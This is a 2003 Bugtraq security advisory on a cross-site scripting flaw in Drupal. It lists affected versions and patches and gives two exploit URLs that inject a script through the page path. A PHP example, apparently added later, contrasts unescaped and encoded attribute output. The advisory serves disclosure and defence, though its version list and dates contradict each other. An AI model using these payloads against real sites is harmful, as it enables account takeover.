Message-ID: <001101c34f48$a71b7520$d764aec3@SS>
Date: Mon, 21 Jul 2003 08:26:30 +0300
From: "Ferruh Mavituna" <ferruh@...ituna.com>
To: <bugtraq@...urityfocus.com>
Subject: Drupal XSS Vulnerability (main page and sub pages)
------------------------------------------------------
Drupal XSS Vulnerability (main page and sub pages)
------------------------------------------------------
Any kind of XSS attack is possible. An attacker could access other
users' or admins' Drupal accounts.
------------------------------------------------------
About Drupal;
------------------------------------------------------
www.drupal.com
Drupal is an open-source platform and content management system for building
dynamic web sites offering a broad range of features and services including
user administration, publishing workflow, discussion capabilities, news
aggregation, metadata functionalities using controlled vocabularies and XML
publishing for content sharing purposes. Equipped with a powerful blend of
features and configurability, Drupal can support a diverse range of web
projects ranging from personal weblogs to large community-driven sites.
------------------------------------------------------
Vulnerable;
------------------------------------------------------
TESTED;
Drupal 4.2.0 RC
NOT TESTED - 90% VULNERABLE;
Drupal 4.1.0
Drupal 4.0.0
Drupal 3.0.2
Drupal 3.0.1
Drupal 3.0.0
Drupal 2.0.0
Drupal 1.0.0
------------------------------------------------------
Not Vulnerable;
------------------------------------------------------
Drupal 4.2.0 RC
------------------------------------------------------
Vendor Status;
------------------------------------------------------
Vendor replied and fixed quickly.
------------------------------------------------------
Solution & Patches;
------------------------------------------------------
xss-cvs.patch
xss-4.2.0-rc.patch
xss-4.1.0.patch
Download patch files:
http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip
Better yet, download the new version from www.drupal.org
[All files provided by Vendor]
------------------------------------------------------
Exploit Code;
------------------------------------------------------
http://[victim]/xxx"][script]alert(document.domain)]/script]["
------------------------------------------------------
Exploit - 2;
------------------------------------------------------
http://[victim]/node/view/666"><script>alert(document.domain)</script>
Replace "[]" with "<>".
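
The pattern behind both URLs, shown as an added example (not code from this advisory or from Drupal): a request path written into a double-quoted HTML attribute, with and without output encoding. The function names and the form markup are assumptions, since the advisory does not show the affected Drupal code.

```php
<?php
// Added illustration, not Drupal's code: function names and markup are hypothetical.

// Vulnerable pattern: the request path is copied into a double-quoted
// attribute unchanged, so a '"' in the path ends the attribute early.
function render_unsafe(string $path): string
{
    return '<form action="' . $path . '" method="post">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both quote styles; '<', '>' and '&' are always encoded.
function render_safe(string $path): string
{
    $encoded = htmlspecialchars($path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $encoded . '" method="post">';
}

// Regression check: the output must still be exactly one <form> tag whose
// action value contains no raw '"', '<' or '>'.
function attribute_intact(string $html): bool
{
    return preg_match('/^<form action="[^"<>]*" method="post">$/', $html) === 1;
}

$paths = [
    '/node/view/666',                                          // ordinary request
    '/node/view/666"><script>alert(document.domain)</script>', // path from the advisory
];

foreach ($paths as $path) {
    foreach (['render_unsafe', 'render_safe'] as $renderer) {
        $html = $renderer($path);
        printf("%-13s %-6s %s\n", $renderer, attribute_intact($html) ? 'intact' : 'BROKEN', $html);
    }
}
```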
------------------------------------------------------
History;
------------------------------------------------------
30.05.2003 - Discovered
03.05.2003 - Vendor Informed
03.05.2003 - Fixed by Vendor
Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh@...ituna.com